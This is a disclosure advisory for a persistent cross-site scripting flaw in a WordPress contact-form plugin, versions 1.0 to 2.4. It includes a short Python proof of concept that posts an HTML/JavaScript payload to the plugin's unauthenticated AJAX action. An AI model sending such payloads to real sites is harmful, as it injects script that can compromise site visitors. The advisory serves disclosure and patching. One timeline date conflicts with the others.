Contact Form Integrated With Google Maps 1.0 - 2.4, Persistent XSS
Due to exposing an AJAX function to anonymous users by using the ‘nopriv’ method of adding an AJAX action, anonymous users are able to insert arbitrary HTML / Javascript onto the site globally.
Homepage
https://wordpress.org/plugins/contact-form-integrated-with-google-maps/
CVSS Score
6.4
CSSS Vector
(AV:N/AC:L/Au:N/C:P/I:P/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Update to version 2.5
Proof of Concept
The following Python script will result arbitrary Javascript being executed on page load. Any custom HTML content can be inserted into the ‘value’ field, so long as an ‘iframe’ element exists in the provided data
import requests
url = 'http://localhost/wp-admin/admin-ajax.php'
payload = {
"action":"master_response",
"value":"<iframe></iframe><script>alert('.');</script>"}
r = requests.post(url, data=payload)
Timeline
- 2014-09-22: Discovered
- 2014-09-22: Reported to vendor
- 2014-09-22: Vendor responded with intent to fix
- 2014-09-29: Update requested from vendor
- 2014-09-30: CVE requested
- 2014-09-02: CVE assigned
- 2014-10-06: Update requested from vendor
- 2014-10-11: 2.5 released – issue resolved
- 2014-10-18: Advisory released